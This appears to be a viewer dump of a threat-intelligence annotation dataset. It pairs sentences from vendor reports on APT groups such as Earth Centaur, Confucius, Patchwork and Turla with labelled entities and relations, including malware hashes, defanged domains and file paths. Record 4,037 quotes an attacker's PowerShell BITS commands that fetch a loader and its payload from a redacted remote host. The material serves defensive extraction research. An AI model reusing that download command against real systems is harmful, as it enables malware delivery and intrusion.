id
int64
105
14.4k
text
stringlengths
39
889
entities
list
relations
list
Comments
list
3,911
Based on our investigation, the Chopper web shell is dropped via a system token, potentially via a Microsoft Exchange Server vulnerability.
[ { "id": 49762, "label": "vulnerability", "start_offset": 99, "end_offset": 138 }, { "id": 49763, "label": "malware", "start_offset": 32, "end_offset": 49 } ]
[ { "id": 865, "from_id": 49763, "to_id": 49762, "type": "exploits" } ]
[]
3,912
One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.
[ { "id": 49764, "label": "SOFTWARE", "start_offset": 33, "end_offset": 58 }, { "id": 49765, "label": "vulnerability", "start_offset": 62, "end_offset": 75 }, { "id": 49766, "label": "attack-pattern", "start_offset": 79, "end_offset": 100 } ]
[ { "id": 866, "from_id": 49764, "to_id": 49765, "type": "has" }, { "id": 867, "from_id": 49765, "to_id": 49766, "type": "uses" } ]
[]
3,971
As observed on CVE-2020-0688, the use of static keys — as opposed to randomly generated keys — can allow an attacker to execute arbitrary code by tricking the server into deserializing ViewState data.
[ { "id": 49830, "label": "vulnerability", "start_offset": 16, "end_offset": 29 }, { "id": 49831, "label": "attack-pattern", "start_offset": 121, "end_offset": 143 } ]
[ { "id": 868, "from_id": 49830, "to_id": 49831, "type": "uses" } ]
[]
3,977
Indicators of compromise Filename Path SHA-256 Detection Notes ss.exe C:\temp\ ee63b49aca1495a170ea7273316385b606f3fd2df1e48e9f4de0f241d98bd055 HackTool.Win32.CATLIKE.A Vulnerability Scanner LG.exe C:\temp\ C:\hp\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool LG.dat C:\hp\ 5099264b16208d88c9bca960751f5e3de7a5420986fa0d7e2b2a6b16af3909e9 HackTool.Win32.JoeWare.A. JoeWare Local Group Manipulation tool mpBD6D42.dat C:\Users C:\Perflogs C:\hp C:\temp e9be71848d1faa0c41db4c6a1e901747d98fb0b3cca027f8be85ea5e339b75e3 HackTool.MSIL.Mimikatz.AF Mimikatz Tags Endpoints | APT & Targeted Attacks | Research | Network | Articles, News, Reports
[ { "id": 12061, "label": "SHA2", "start_offset": 227, "end_offset": 291 }, { "id": 12063, "label": "SHA2", "start_offset": 375, "end_offset": 439 }, { "id": 12060, "label": "SHA2", "start_offset": 87, "end_offset": 151 }, { "id": 12066, "label": "tools", "start_offset": 650, "end_offset": 658 }, { "id": 12065, "label": "SHA2", "start_offset": 557, "end_offset": 621 }, { "id": 49840, "label": "FILEPATH", "start_offset": 202, "end_offset": 208 }, { "id": 49845, "label": "malware", "start_offset": 623, "end_offset": 648 }, { "id": 49847, "label": "FILEPATH", "start_offset": 367, "end_offset": 373 }, { "id": 49848, "label": "FILEPATH", "start_offset": 507, "end_offset": 519 }, { "id": 49849, "label": "FILEPATH", "start_offset": 521, "end_offset": 541 }, { "id": 49850, "label": "FILEPATH", "start_offset": 542, "end_offset": 555 }, { "id": 49837, "label": "FILEPATH", "start_offset": 69, "end_offset": 75 }, { "id": 49842, "label": "FILEPATH", "start_offset": 219, "end_offset": 225 }, { "id": 49838, "label": "FILEPATH", "start_offset": 77, "end_offset": 85 }, { "id": 49839, "label": "malware", "start_offset": 153, "end_offset": 177 }, { "id": 49841, "label": "FILEPATH", "start_offset": 210, "end_offset": 218 }, { "id": 49843, "label": "malware", "start_offset": 293, "end_offset": 317 }, { "id": 49844, "label": "malware", "start_offset": 441, "end_offset": 465 }, { "id": 49846, "label": "FILEPATH", "start_offset": 359, "end_offset": 365 } ]
[ { "id": 869, "from_id": 12060, "to_id": 49839, "type": "indicates" }, { "id": 870, "from_id": 49838, "to_id": 49839, "type": "indicates" }, { "id": 871, "from_id": 49837, "to_id": 49839, "type": "indicates" }, { "id": 872, "from_id": 12061, "to_id": 49843, "type": "indicates" }, { "id": 873, "from_id": 49842, "to_id": 49843, "type": "indicates" }, { "id": 874, "from_id": 49841, "to_id": 49843, "type": "indicates" }, { "id": 875, "from_id": 49840, "to_id": 49843, "type": "indicates" }, { "id": 876, "from_id": 49846, "to_id": 49844, "type": "indicates" }, { "id": 877, "from_id": 49847, "to_id": 49844, "type": "indicates" }, { "id": 878, "from_id": 12063, "to_id": 49844, "type": "indicates" }, { "id": 879, "from_id": 49848, "to_id": 49845, "type": "indicates" }, { "id": 880, "from_id": 49849, "to_id": 49845, "type": "indicates" }, { "id": 881, "from_id": 49850, "to_id": 49845, "type": "indicates" }, { "id": 882, "from_id": 12065, "to_id": 49845, "type": "indicates" } ]
[]
4,015
Earth Centaur, previously known as Tropic Trooper, is a long-running cyberespionage threat group that has been active since 2011.
[ { "id": 49866, "label": "TIME", "start_offset": 118, "end_offset": 128 }, { "id": 49865, "label": "threat-actor", "start_offset": 35, "end_offset": 49 }, { "id": 49864, "label": "threat-actor", "start_offset": 0, "end_offset": 13 } ]
[ { "id": 883, "from_id": 49864, "to_id": 49865, "type": "duplicate-of" } ]
[]
4,030
We found that the threat actors used vulnerable Internet Information Services (IIS) server and Exchange server vulnerabilities as entry points, and then installed web shells.
[ { "id": 49871, "label": "vulnerability", "start_offset": 96, "end_offset": 127 }, { "id": 49872, "label": "vulnerability", "start_offset": 38, "end_offset": 91 }, { "id": 49873, "label": "attack-pattern", "start_offset": 164, "end_offset": 174 } ]
[ { "id": 884, "from_id": 49872, "to_id": 49873, "type": "uses" }, { "id": 885, "from_id": 49871, "to_id": 49873, "type": "uses" } ]
[]
4,031
Afterward, the .NET loader (detected as Nerapack) and the first stage backdoor (Quasar remote administration tool aka Quasar RAT) were deployed on the compromised machine.
[ { "id": 49875, "label": "malware", "start_offset": 80, "end_offset": 113 }, { "id": 49874, "label": "malware", "start_offset": 40, "end_offset": 48 }, { "id": 49876, "label": "malware", "start_offset": 118, "end_offset": 128 } ]
[ { "id": 887, "from_id": 49875, "to_id": 49876, "type": "duplicate-of" }, { "id": 888, "from_id": 49874, "to_id": 49876, "type": "delivers" } ]
[]
4,037
After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.exe' "%temp%/dfmanager.exe"}" C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.bin' "C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin"}"
[ { "id": 49882, "label": "attack-pattern", "start_offset": 92, "end_offset": 102 }, { "id": 49888, "label": "FILEPATH", "start_offset": 385, "end_offset": 405 }, { "id": 49891, "label": "URL", "start_offset": 566, "end_offset": 618 }, { "id": 49889, "label": "FILEPATH", "start_offset": 409, "end_offset": 466 }, { "id": 49883, "label": "tools", "start_offset": 113, "end_offset": 122 }, { "id": 49884, "label": "malware", "start_offset": 182, "end_offset": 190 }, { "id": 49885, "label": "threat-actor", "start_offset": 10, "end_offset": 23 }, { "id": 49886, "label": "FILEPATH", "start_offset": 228, "end_offset": 285 }, { "id": 49887, "label": "URL", "start_offset": 346, "end_offset": 382 }, { "id": 49881, "label": "vulnerability", "start_offset": 68, "end_offset": 87 }, { "id": 49890, "label": "URL", "start_offset": 527, "end_offset": 563 } ]
[ { "id": 889, "from_id": 49885, "to_id": 49881, "type": "exploits" }, { "id": 890, "from_id": 49885, "to_id": 49882, "type": "uses" }, { "id": 891, "from_id": 49885, "to_id": 49883, "type": "uses" }, { "id": 892, "from_id": 49883, "to_id": 49884, "type": "downloads" } ]
[]
4,082
During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT.
[ { "id": 49916, "label": "threat-actor", "start_offset": 30, "end_offset": 44 }, { "id": 49917, "label": "malware", "start_offset": 108, "end_offset": 118 } ]
[ { "id": 893, "from_id": 49916, "to_id": 49917, "type": "uses" } ]
[]
4,165
Based on these special mutex strings, we believe the threat actors come from a Chinese-speaking region.
[ { "id": 49970, "label": "threat-actor", "start_offset": 53, "end_offset": 66 }, { "id": 49971, "label": "location", "start_offset": 79, "end_offset": 102 } ]
[ { "id": 894, "from_id": 49970, "to_id": 49971, "type": "located-at" } ]
[]
4,167
After analyzing the ChiserClient, we found that it shares a similar style of network configuration to the TClient mentioned in our previous research on Earth Centaur.
[ { "id": 12514, "label": "malware", "start_offset": 20, "end_offset": 32 }, { "id": 12515, "label": "malware", "start_offset": 106, "end_offset": 113 }, { "id": 49972, "label": "threat-actor", "start_offset": 152, "end_offset": 166 } ]
[ { "id": 895, "from_id": 12515, "to_id": 49972, "type": "authored-by" }, { "id": 896, "from_id": 12514, "to_id": 49972, "type": "authored-by" } ]
[]
4,171
After checking the backdoor SmileSvr, we found that there was a code similarity between it and Troj_YAHAMAM, which was used by Earth Centaur in an earlier operation.
[ { "id": 49973, "label": "malware", "start_offset": 95, "end_offset": 107 }, { "id": 49974, "label": "threat-actor", "start_offset": 127, "end_offset": 140 } ]
[ { "id": 897, "from_id": 49974, "to_id": 49973, "type": "uses" } ]
[]
4,204
Back in February, we noted the similarities between the Patchwork and Confucius groups and found that, in addition to the similarities in their malware code, both groups primarily went after targets in South Asia.
[ { "id": 50016, "label": "threat-actor", "start_offset": 70, "end_offset": 79 }, { "id": 50014, "label": "TIME", "start_offset": 8, "end_offset": 16 }, { "id": 50015, "label": "threat-actor", "start_offset": 56, "end_offset": 65 }, { "id": 50017, "label": "location", "start_offset": 202, "end_offset": 212 } ]
[ { "id": 898, "from_id": 50015, "to_id": 50016, "type": "related-to" }, { "id": 899, "from_id": 50015, "to_id": 50017, "type": "targets" }, { "id": 900, "from_id": 50016, "to_id": 50017, "type": "targets" }, { "id": 901, "from_id": 50016, "to_id": 50015, "type": "related-to" } ]
[]
4,205
During the months that followed in which we tracked Confucius’ activities, we found that they were still aiming for Pakistani targets.
[ { "id": 50019, "label": "location", "start_offset": 116, "end_offset": 125 }, { "id": 50018, "label": "threat-actor", "start_offset": 52, "end_offset": 61 } ]
[ { "id": 902, "from_id": 50018, "to_id": 50019, "type": "targets" } ]
[]
4,242
We already mentioned that Confucius had possible links to other groups in our previous blog post, which mentioned code sharing between Patchwork and Confucius.
[ { "id": 50045, "label": "threat-actor", "start_offset": 26, "end_offset": 35 }, { "id": 50046, "label": "threat-actor", "start_offset": 135, "end_offset": 144 }, { "id": 50047, "label": "threat-actor", "start_offset": 149, "end_offset": 158 } ]
[ { "id": 903, "from_id": 50046, "to_id": 50047, "type": "related-to" } ]
[]
4,244
We found more code shared among the two threat actor’s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.
[ { "id": 50049, "label": "malware", "start_offset": 138, "end_offset": 152 }, { "id": 50050, "label": "malware", "start_offset": 100, "end_offset": 114 }, { "id": 50048, "label": "threat-actor", "start_offset": 67, "end_offset": 76 } ]
[ { "id": 904, "from_id": 50048, "to_id": 50050, "type": "uses" }, { "id": 905, "from_id": 50049, "to_id": 50050, "type": "duplicate-of" } ]
[]
4,249
Figure 6: Decompiled Form structure of Confucius’ sample (d971842441c83c1bba05742d124620f5741bb5d5da9ffb31f06efa4bbdcf04ee, Detected as TSPY_CONFSTEAL.A) Figure 7:
[ { "id": 50051, "label": "SHA2", "start_offset": 58, "end_offset": 122 }, { "id": 50052, "label": "malware", "start_offset": 136, "end_offset": 152 } ]
[ { "id": 906, "from_id": 50051, "to_id": 50052, "type": "indicates" } ]
[]
4,250
Decompiled Form structure of Patchwork’s sample (795ae4097aa3bd5932be4110f6bd992f46d605d4c9e3afced314454d35395a59, Detected as TROJ_DELF.XXWZ)
[ { "id": 12743, "label": "threat-actor", "start_offset": 29, "end_offset": 38 }, { "id": 12745, "label": "SHA2", "start_offset": 49, "end_offset": 113 }, { "id": 50053, "label": "malware", "start_offset": 127, "end_offset": 141 } ]
[ { "id": 907, "from_id": 12745, "to_id": 50053, "type": "indicates" }, { "id": 908, "from_id": 12743, "to_id": 50053, "type": "uses" } ]
[]
4,264
Interestingly, one of those keys, “xldbszcd”, was found in a file stealer used by Confucius (472ea4929c5e0fb4e29597311ed90a14c57bc67fbf26f81a3aac042aa3dccb55, Detected as TSPY_CONFSTEAL.A) as well as in two other file stealers.
[ { "id": 50061, "label": "SHA2", "start_offset": 93, "end_offset": 157 }, { "id": 50062, "label": "malware", "start_offset": 171, "end_offset": 187 }, { "id": 50060, "label": "threat-actor", "start_offset": 82, "end_offset": 91 } ]
[ { "id": 909, "from_id": 50061, "to_id": 50062, "type": "indicates" }, { "id": 910, "from_id": 50060, "to_id": 50062, "type": "uses" } ]
[]
4,265
One file stealer (cca74bb322ad7833a21209b1418c9837e30983daec30d199a839f46075ee72f2, Detected as TSPY_DELF.SUW) published by security researchers in 2013 and linked to the domain myflatnet[.]com, was attributed by several parties to the Hangover group.
[ { "id": 50067, "label": "threat-actor", "start_offset": 236, "end_offset": 250 }, { "id": 50063, "label": "SHA2", "start_offset": 18, "end_offset": 82 }, { "id": 50064, "label": "malware", "start_offset": 96, "end_offset": 109 }, { "id": 50065, "label": "TIME", "start_offset": 148, "end_offset": 152 }, { "id": 50066, "label": "DOMAIN", "start_offset": 178, "end_offset": 193 } ]
[ { "id": 911, "from_id": 50063, "to_id": 50064, "type": "indicates" }, { "id": 912, "from_id": 50064, "to_id": 50066, "type": "communicates-with" }, { "id": 913, "from_id": 50064, "to_id": 50067, "type": "attributed-to" } ]
[]
4,266
The other file stealer (1f0dabd61947b6df8a392b77a0eae33777be3caad13698aecc223b54ab4b859a, Detected as TROJ_DELF.XXWZ) is related to a domain reported in September 2016.
[ { "id": 50069, "label": "malware", "start_offset": 102, "end_offset": 116 }, { "id": 50070, "label": "TIME", "start_offset": 153, "end_offset": 167 }, { "id": 50068, "label": "SHA2", "start_offset": 24, "end_offset": 88 } ]
[ { "id": 914, "from_id": 50068, "to_id": 50069, "type": "indicates" } ]
[]
4,277
The dropped payloads are modified versions of the Remote Administration Tool QuasarRAT that can be traced to the domains sastind-cn[.]org and tautiaos[.]com.
[ { "id": 50080, "label": "DOMAIN", "start_offset": 142, "end_offset": 156 }, { "id": 50078, "label": "malware", "start_offset": 77, "end_offset": 86 }, { "id": 50079, "label": "DOMAIN", "start_offset": 121, "end_offset": 137 } ]
[ { "id": 915, "from_id": 50078, "to_id": 50079, "type": "communicates-with" }, { "id": 916, "from_id": 50078, "to_id": 50080, "type": "communicates-with" } ]
[]
4,286
The group still uses the Badnews malware, a backdoor with information-stealing and file-executing capabilities, albeit updated with a slight modification in the encryption routine at the end of 2017, when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost.
[ { "id": 50084, "label": "malware", "start_offset": 25, "end_offset": 40 }, { "id": 50085, "label": "attack-pattern", "start_offset": 58, "end_offset": 78 }, { "id": 50086, "label": "attack-pattern", "start_offset": 83, "end_offset": 97 }, { "id": 50087, "label": "TIME", "start_offset": 187, "end_offset": 198 }, { "id": 50088, "label": "threat-actor", "start_offset": 294, "end_offset": 303 } ]
[ { "id": 917, "from_id": 50084, "to_id": 50085, "type": "uses" }, { "id": 918, "from_id": 50084, "to_id": 50086, "type": "uses" } ]
[]
4,356
It should be noted that in some occasions, the threat actor sent spear-phishing emails from the domain name mailerservice[.]directory which we attributed to the Patchwork threat actor in previous research.
[ { "id": 50138, "label": "attack-pattern", "start_offset": 65, "end_offset": 79 }, { "id": 50139, "label": "DOMAIN", "start_offset": 108, "end_offset": 133 }, { "id": 50140, "label": "threat-actor", "start_offset": 161, "end_offset": 170 } ]
[ { "id": 919, "from_id": 50139, "to_id": 50140, "type": "attributed-to" } ]
[]
4,367
Trend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks. Indicators of Compromise Hashes of the malicious encrypted documents: SHA256 Detection name dacf7868a71440a7d7d8797caca1aa29b7780801e6f3b3bc33123f16989354b2 Trojan.W97M.CONFUCIUS.A 0f6bcbdf4d192f8273887f9858819dd4690397a92fb28a60bb731c873c438e07 Trojan.W97M.CONFUCIUS.B
[ { "id": 50153, "label": "malware", "start_offset": 428, "end_offset": 451 }, { "id": 50149, "label": "SOFTWARE", "start_offset": 0, "end_offset": 28 }, { "id": 50150, "label": "SHA2", "start_offset": 271, "end_offset": 335 }, { "id": 50151, "label": "malware", "start_offset": 337, "end_offset": 360 }, { "id": 50152, "label": "SHA2", "start_offset": 362, "end_offset": 426 } ]
[ { "id": 920, "from_id": 50150, "to_id": 50151, "type": "indicates" }, { "id": 921, "from_id": 50152, "to_id": 50153, "type": "indicates" } ]
[]
4,369
Trojan.W97M.CONFUCIUS.B 654c7021a4482da21e149ded58643b279ffbce66badf1a0a7fc3551acd607312 Trojan.W97M.CONFUCIUS.C 712172b5b1895bbfcced961a83baa448e26e93e301be407e6b9dc8cb6526277f Trojan.Win32.DLOADR.TIOIBELQ
[ { "id": 13099, "label": "SHA2", "start_offset": 26, "end_offset": 90 }, { "id": 13100, "label": "SHA2", "start_offset": 117, "end_offset": 181 }, { "id": 50154, "label": "malware", "start_offset": 1, "end_offset": 24 }, { "id": 50155, "label": "malware", "start_offset": 92, "end_offset": 115 }, { "id": 50156, "label": "malware", "start_offset": 183, "end_offset": 211 } ]
[ { "id": 922, "from_id": 13099, "to_id": 50154, "type": "indicates" }, { "id": 923, "from_id": 13100, "to_id": 50155, "type": "indicates" } ]
[]
4,373
As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users.
[ { "id": 50174, "label": "identity", "start_offset": 11, "end_offset": 14 }, { "id": 50178, "label": "identity", "start_offset": 162, "end_offset": 180 }, { "id": 50175, "label": "identity", "start_offset": 55, "end_offset": 61 }, { "id": 50176, "label": "threat-actor", "start_offset": 132, "end_offset": 137 }, { "id": 50177, "label": "threat-actor", "start_offset": 142, "end_offset": 157 } ]
[ { "id": 924, "from_id": 50177, "to_id": 50178, "type": "attributed-to" }, { "id": 925, "from_id": 50176, "to_id": 50177, "type": "duplicate-of" } ]
[]
4,376
In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts.
[ { "id": 13122, "label": "threat-actor", "start_offset": 41, "end_offset": 56 }, { "id": 50182, "label": "TIME", "start_offset": 3, "end_offset": 16 }, { "id": 50183, "label": "identity", "start_offset": 18, "end_offset": 21 }, { "id": 50188, "label": "attack-pattern", "start_offset": 90, "end_offset": 105 }, { "id": 50186, "label": "SOFTWARE", "start_offset": 118, "end_offset": 124 }, { "id": 50184, "label": "malware", "start_offset": 69, "end_offset": 80 }, { "id": 50185, "label": "SOFTWARE", "start_offset": 111, "end_offset": 116 }, { "id": 50187, "label": "SOFTWARE", "start_offset": 130, "end_offset": 147 } ]
[ { "id": 926, "from_id": 50184, "to_id": 13122, "type": "authored-by" }, { "id": 927, "from_id": 50184, "to_id": 50188, "type": "uses" }, { "id": 928, "from_id": 50184, "to_id": 50185, "type": "targets" }, { "id": 929, "from_id": 50184, "to_id": 50186, "type": "targets" }, { "id": 930, "from_id": 50184, "to_id": 50187, "type": "targets" } ]
[]
4,383
Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.
[ { "id": 50196, "label": "malware", "start_offset": 28, "end_offset": 39 }, { "id": 50197, "label": "threat-actor", "start_offset": 135, "end_offset": 150 } ]
[ { "id": 931, "from_id": 50197, "to_id": 50196, "type": "uses" } ]
[]
4,450
Our Threat Analysis Group, or TAG, is dedicated to protecting users from threats posed by state-sponsored malware attacks and other advanced persistent threats.
[ { "id": 50226, "label": "identity", "start_offset": 4, "end_offset": 25 }, { "id": 50227, "label": "identity", "start_offset": 30, "end_offset": 33 } ]
[ { "id": 932, "from_id": 50227, "to_id": 50226, "type": "duplicate-of" } ]
[]
4,459
In 2017, Android – which is owned by Google – was the first mobile platform to warn users about NSO Group’s Pegasus spyware.
[ { "id": 50241, "label": "malware", "start_offset": 108, "end_offset": 115 }, { "id": 50237, "label": "TIME", "start_offset": 3, "end_offset": 7 }, { "id": 50240, "label": "threat-actor", "start_offset": 96, "end_offset": 105 }, { "id": 50238, "label": "SOFTWARE", "start_offset": 9, "end_offset": 16 }, { "id": 50239, "label": "identity", "start_offset": 37, "end_offset": 43 } ]
[ { "id": 933, "from_id": 50241, "to_id": 50240, "type": "authored-by" } ]
[]
4,460
At the time, our Android team released research about a newly discovered family of spyware related to Pegasus that was used in a targeted attack on a small number of Android devices.
[ { "id": 50243, "label": "malware", "start_offset": 102, "end_offset": 109 }, { "id": 50244, "label": "SOFTWARE", "start_offset": 166, "end_offset": 173 }, { "id": 50245, "label": "identity", "start_offset": 17, "end_offset": 29 } ]
[ { "id": 934, "from_id": 50243, "to_id": 50244, "type": "targets" } ]
[]
4,471
For example, TAG discovered campaigns targeting Armenian users which utilized zero-day vulnerabilities in Chrome and Internet Explorer.
[ { "id": 50266, "label": "campaign", "start_offset": 28, "end_offset": 37 }, { "id": 50261, "label": "identity", "start_offset": 13, "end_offset": 16 }, { "id": 50265, "label": "SOFTWARE", "start_offset": 117, "end_offset": 134 }, { "id": 50262, "label": "location", "start_offset": 48, "end_offset": 56 }, { "id": 50263, "label": "vulnerability", "start_offset": 78, "end_offset": 102 }, { "id": 50264, "label": "SOFTWARE", "start_offset": 106, "end_offset": 112 } ]
[ { "id": 935, "from_id": 50266, "to_id": 50262, "type": "targets" }, { "id": 936, "from_id": 50266, "to_id": 50263, "type": "exploits" }, { "id": 937, "from_id": 50264, "to_id": 50263, "type": "has" }, { "id": 938, "from_id": 50265, "to_id": 50263, "type": "has" } ]
[]
4,473
Reporting by CitizenLab linked this activity to Candiru, an Israeli spyware vendor.
[ { "id": 50267, "label": "identity", "start_offset": 13, "end_offset": 23 }, { "id": 50268, "label": "threat-actor", "start_offset": 48, "end_offset": 55 }, { "id": 50269, "label": "location", "start_offset": 60, "end_offset": 67 } ]
[ { "id": 939, "from_id": 50268, "to_id": 50269, "type": "located-at" } ]
[]
4,475
Most recently, we reported in May on five zero-day vulnerabilities affecting Chrome and Android which were used to compromise Android users.
[ { "id": 50274, "label": "SOFTWARE", "start_offset": 126, "end_offset": 133 }, { "id": 50271, "label": "vulnerability", "start_offset": 42, "end_offset": 66 }, { "id": 50272, "label": "SOFTWARE", "start_offset": 77, "end_offset": 83 }, { "id": 50273, "label": "SOFTWARE", "start_offset": 88, "end_offset": 95 } ]
[ { "id": 940, "from_id": 50272, "to_id": 50271, "type": "has" }, { "id": 941, "from_id": 50273, "to_id": 50271, "type": "has" } ]
[]
4,497
The actors behind this campaign, which we attributed to a government-backed entity based in North Korea, have employed a number of means to target researchers.
[ { "id": 50299, "label": "campaign", "start_offset": 23, "end_offset": 31 }, { "id": 50300, "label": "location", "start_offset": 92, "end_offset": 103 } ]
[ { "id": 942, "from_id": 50299, "to_id": 50300, "type": "attributed-to" } ]
[]
4,547
Many Russian government cyber assets have remained focused on Ukraine and related issues since the invasion began, while Russian APT activity outside of Ukraine largely remains the same.
[ { "id": 50344, "label": "location", "start_offset": 153, "end_offset": 160 }, { "id": 50342, "label": "location", "start_offset": 62, "end_offset": 69 }, { "id": 50343, "label": "threat-actor", "start_offset": 121, "end_offset": 132 }, { "id": 50346, "label": "threat-actor", "start_offset": 5, "end_offset": 36 } ]
[ { "id": 943, "from_id": 50346, "to_id": 50342, "type": "targets" } ]
[]
4,549
Similarly, Russian observed disinformation efforts are also focused on the war in Ukraine and TAG has disrupted coordinated influence operations from several actors including the Internet Research Agency and a Russian consulting firm as detailed in the TAG Bulletin.
[ { "id": 50351, "label": "threat-actor", "start_offset": 179, "end_offset": 203 }, { "id": 50349, "label": "location", "start_offset": 82, "end_offset": 89 }, { "id": 50350, "label": "identity", "start_offset": 94, "end_offset": 97 }, { "id": 50352, "label": "threat-actor", "start_offset": 210, "end_offset": 233 }, { "id": 50353, "label": "identity", "start_offset": 253, "end_offset": 256 } ]
[ { "id": 944, "from_id": 50351, "to_id": 50349, "type": "targets" }, { "id": 945, "from_id": 50352, "to_id": 50349, "type": "targets" } ]
[]
4,551
Here is a deeper look at some campaign activity TAG has observed since our last update: Turla, a group publicly attributed to Russia’s Federal Security Service (FSB), recently hosted Android apps on a domain spoofing the Ukrainian Azov Regiment.
[ { "id": 50355, "label": "identity", "start_offset": 48, "end_offset": 51 }, { "id": 50356, "label": "threat-actor", "start_offset": 88, "end_offset": 93 }, { "id": 50357, "label": "identity", "start_offset": 135, "end_offset": 165 }, { "id": 50358, "label": "location", "start_offset": 126, "end_offset": 132 }, { "id": 50359, "label": "SOFTWARE", "start_offset": 183, "end_offset": 190 }, { "id": 50360, "label": "identity", "start_offset": 221, "end_offset": 244 } ]
[ { "id": 946, "from_id": 50356, "to_id": 50357, "type": "attributed-to" }, { "id": 947, "from_id": 50357, "to_id": 50358, "type": "located-at" }, { "id": 948, "from_id": 50357, "to_id": 50360, "type": "impersonates" } ]
[]
4,552
This is the first known instance of Turla distributing Android-related malware.
[ { "id": 50361, "label": "threat-actor", "start_offset": 36, "end_offset": 41 }, { "id": 50362, "label": "SOFTWARE", "start_offset": 55, "end_offset": 62 } ]
[ { "id": 949, "from_id": 50361, "to_id": 50362, "type": "targets" } ]
[]
4,558
During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.
[ { "id": 50370, "label": "TIME", "start_offset": 116, "end_offset": 126 }, { "id": 50368, "label": "malware", "start_offset": 34, "end_offset": 54 }, { "id": 50369, "label": "SOFTWARE", "start_offset": 78, "end_offset": 85 }, { "id": 50371, "label": "attack-pattern", "start_offset": 156, "end_offset": 159 }, { "id": 50372, "label": "location", "start_offset": 176, "end_offset": 183 } ]
[ { "id": 950, "from_id": 50368, "to_id": 50369, "type": "targets" } ]
[]
4,562
Based on our analysis, we believe that the StopWar app was developed by pro-Ukrainian developers and was the inspiration for what Turla actors based their fake CyberAzov DoS app off of.
[ { "id": 50379, "label": "malware", "start_offset": 43, "end_offset": 54 }, { "id": 50380, "label": "threat-actor", "start_offset": 130, "end_offset": 142 }, { "id": 50381, "label": "malware", "start_offset": 160, "end_offset": 177 } ]
[ { "id": 951, "from_id": 50381, "to_id": 50380, "type": "authored-by" } ]
[]
4,564
Follina is a remote code execution (RCE) vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).
[ { "id": 50386, "label": "vulnerability", "start_offset": 13, "end_offset": 54 }, { "id": 50387, "label": "SOFTWARE", "start_offset": 62, "end_offset": 110 } ]
[ { "id": 952, "from_id": 50387, "to_id": 50386, "type": "has" } ]
[]
4,565
Consistent with CERT-UA reporting, TAG observed multiple Russian GRU actors - APT28 and Sandworm - conduct campaigns exploiting the Follina vulnerability.
[ { "id": 50390, "label": "identity", "start_offset": 35, "end_offset": 38 }, { "id": 50389, "label": "identity", "start_offset": 16, "end_offset": 23 }, { "id": 50391, "label": "identity", "start_offset": 57, "end_offset": 68 }, { "id": 50392, "label": "threat-actor", "start_offset": 78, "end_offset": 83 }, { "id": 50394, "label": "vulnerability", "start_offset": 132, "end_offset": 153 }, { "id": 50393, "label": "threat-actor", "start_offset": 88, "end_offset": 96 } ]
[ { "id": 956, "from_id": 50393, "to_id": 50391, "type": "attributed-to" }, { "id": 953, "from_id": 50393, "to_id": 50394, "type": "exploits" }, { "id": 954, "from_id": 50392, "to_id": 50394, "type": "exploits" }, { "id": 955, "from_id": 50392, "to_id": 50391, "type": "attributed-to" } ]
[]
4,566
The Sandworm campaign used compromised government accounts to send links to Microsoft Office documents hosted on compromised domains, primarily targeting media organizations in Ukraine.
[ { "id": 50395, "label": "campaign", "start_offset": 4, "end_offset": 21 }, { "id": 50396, "label": "attack-pattern", "start_offset": 27, "end_offset": 58 }, { "id": 50397, "label": "SOFTWARE", "start_offset": 76, "end_offset": 92 }, { "id": 50398, "label": "location", "start_offset": 177, "end_offset": 184 } ]
[ { "id": 957, "from_id": 50395, "to_id": 50396, "type": "uses" }, { "id": 958, "from_id": 50395, "to_id": 50397, "type": "targets" } ]
[]
4,568
One recent campaign from a group tracked by CERT-UA as UAC-0098 delivered malicious documents with the Follina exploit in password-protected archives, impersonating the State Tax Service of Ukraine.
[ { "id": 50401, "label": "identity", "start_offset": 44, "end_offset": 51 }, { "id": 50402, "label": "threat-actor", "start_offset": 55, "end_offset": 63 }, { "id": 50403, "label": "vulnerability", "start_offset": 103, "end_offset": 118 }, { "id": 50404, "label": "identity", "start_offset": 169, "end_offset": 197 } ]
[ { "id": 959, "from_id": 50402, "to_id": 50404, "type": "impersonates" }, { "id": 960, "from_id": 50402, "to_id": 50403, "type": "uses" } ]
[]
4,569
We assess this actor is a former initial ransomware access broker who previously worked with the Conti ransomware group distributing the IcedID banking trojan based on overlaps in infrastructure, tools used in previous campaigns, and a unique cryptor.
[ { "id": 50405, "label": "threat-actor", "start_offset": 97, "end_offset": 102 }, { "id": 50406, "label": "malware", "start_offset": 137, "end_offset": 158 } ]
[ { "id": 961, "from_id": 50405, "to_id": 50406, "type": "uses" } ]
[]
4,570
Ghostwriter/UNC1151, a threat actor attributed to Belarus, has remained active targeting accounts of webmail and social media networks of Polish users.
[ { "id": 50408, "label": "threat-actor", "start_offset": 12, "end_offset": 19 }, { "id": 50407, "label": "threat-actor", "start_offset": 0, "end_offset": 11 }, { "id": 50409, "label": "location", "start_offset": 50, "end_offset": 57 }, { "id": 50410, "label": "location", "start_offset": 138, "end_offset": 144 } ]
